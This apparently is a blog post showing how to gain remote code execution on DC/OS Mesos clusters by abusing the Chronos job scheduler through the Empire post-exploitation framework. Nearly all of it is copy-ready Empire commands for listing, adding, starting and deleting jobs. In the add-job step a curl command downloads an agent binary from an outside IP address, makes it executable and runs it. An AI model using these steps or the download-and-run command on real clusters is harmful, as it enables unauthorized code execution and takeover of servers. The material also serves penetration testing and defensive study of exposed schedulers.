OWNerchestration - Chronos (ab)Use

We can also gain Remote Code Execution (RCE) on servers within the cluster using the Chronos service. Chronos was frequently installed within DC/OS Mesos clusters to provide scheduling job, similar to crontab but distributed across all servers within the cluster.

An attacker by default can interact with the Chronos service to gain RCE on servers within the cluster using the following techniques within Empire…

List Chronos Jobs

We can use the “http_rest_api” module to list Chronos jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod GET
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/jobs
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute

Add Chronos Job

We can use the “chronos_api_add_job” module to add a Chronos job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/chronos_api_add_job
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)>set Port 24641
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> set Cmd curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> execute

Start Chronos Job

We can use the “http_rest_api” module to start a Chrono jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod PUT
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/job/scheduledJob001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute

Delete a Chronos Job

We can use the “http_rest_api” module to delete a Chronos job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod DELETE
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/job/scheduledJob001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute

Demo

You can see a quick demo of this process in the following video…

Bryce KunzComment